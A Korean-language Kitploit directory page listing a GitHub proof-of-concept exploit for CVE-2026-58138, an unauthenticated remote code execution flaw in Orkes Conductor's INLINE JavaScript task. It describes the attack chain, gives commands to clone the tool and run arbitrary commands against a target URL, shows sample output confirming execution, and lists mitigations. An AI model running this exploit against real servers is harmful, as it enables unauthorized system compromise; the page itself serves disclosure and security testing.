Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-58138 — CVE-2026-58138 - Conductor (3.21.21..<3.30.2) unauthenticated RCE via INLINE GraalVM evaluator | Kitploit
도구/GitHubGitHub/0xgh057r3c0n/cve-2026-58138
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationRed Teaming
GitHub0xgh057r3c0n/cve-2026-58138

CVE-2026-58138

CVE-2026-58138 - Conductor (3.21.21..<3.30.2) unauthenticated RCE via INLINE GraalVM evaluator

저장소 보기
29일 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-58138 — Conductor (3.21.21..<3.30.2) 인증되지 않은 원격 코드 실행

Orkes Conductor

Orkes Conductor의 심각한 원격 코드 실행 취약점

CVE 익스플로잇 Python


📋 개요

CVE-2026-58138는 Orkes Conductor 버전 3.21.21부터 3.30.1까지 영향을 미치는 심각한 인증되지 않은 원격 코드 실행(RCE) 취약점입니다. 이 취약점으로 인해 공격자는 인증 없이 Conductor 서버에서 임의의 명령을 실행할 수 있으며, 잠재적으로 전체 시스템을 손상시킬 수 있습니다.

🔴 심각도

  • CVSS 점수: 9.8 (치명적)
  • 공격 벡터: 네트워크
  • 인증: 필요 없음
  • 영향: 전체 시스템 손상

⚙️ 취약점 상세

취약점은 Orkes Conductor의 워크플로 엔진 내 INLINE 작업 유형에 존재합니다. INLINE 작업은 eval을 통해 Java 객체에 접근할 수 있는 JavaScript 평가를 지원하며, 공격자는 다음을 수행할 수 있습니다:

  1. JavaScript 코드가 포함된 INLINE 작업을 포함하는 악성 워크플로 등록
  2. JavaScript의 Java 상호 운용성을 통해 임의의 Java 코드 실행
  3. java.lang.Runtime.exec()를 통해 Conductor 서버에서 시스템 명령 실행

📦 영향을 받는 버전

버전 범위상태
3.21.21 - 3.30.1✅ 취약
> 3.30.1❌ 패치됨

🚀 설치

root@kitploit:~
# 저장소 복제
git clone https://github.com/0xgh057r3c0n/CVE-2026-58138.git
cd CVE-2026-58138

# 스크립트 실행 권한 부여
chmod +x CVE-2026-58138.py

# 설치 확인
python3 CVE-2026-58138.py --help

💻 사용법

root@kitploit:~
# 기본 사용법
python3 CVE-2026-58138.py http://target:8080

# 사용자 정의 명령
python3 CVE-2026-58138.py http://target:8080 -c "whoami; id"

📊 예시 출력

root@kitploit:~
[>] Orkes Conductor 3.21.21 - 3.30.1 Remote Code Execution
[>] Author: 0xgh057r3c0n
[>] CVE-2026-58138 Unauthenticated RCE PoC

[*] target  = http://192.168.1.100:8080
[*] command = 'id; hostname'
[+] workflow 'pwn_1742345678' registered (HTTP 200)
[+] started workflow id = 123e4567-e89b-12d3-a456-426614174000
[+] UNAUTHENTICATED RCE CONFIRMED – command output:
uid=1000(conductor) gid=1000(conductor) groups=1000(conductor)
conductor-server-6b7c8d9e0f-abc12

🛡️ 완화 조치

  1. 업그레이드 Orkes Conductor 3.30.2 이상으로
  2. 비활성화 필요한 경우가 아니면 INLINE 작업 유형 비활성화
  3. 제한 Conductor API에 대한 네트워크 접근 제한

⚠️ 면책 조항

교육 및 보안 연구 목적으로만 사용하십시오. 소유한 시스템이나 명시적 테스트 허가를 받은 시스템에서만 사용하세요.


📚 참고 자료

  • NVD - CVE-2026-58138
  • Orkes Conductor 보안

⭐ 도움이 되셨나요? GitHub에 별표를 눌러주세요 ⭐

GitHub 별표

도구 다운로드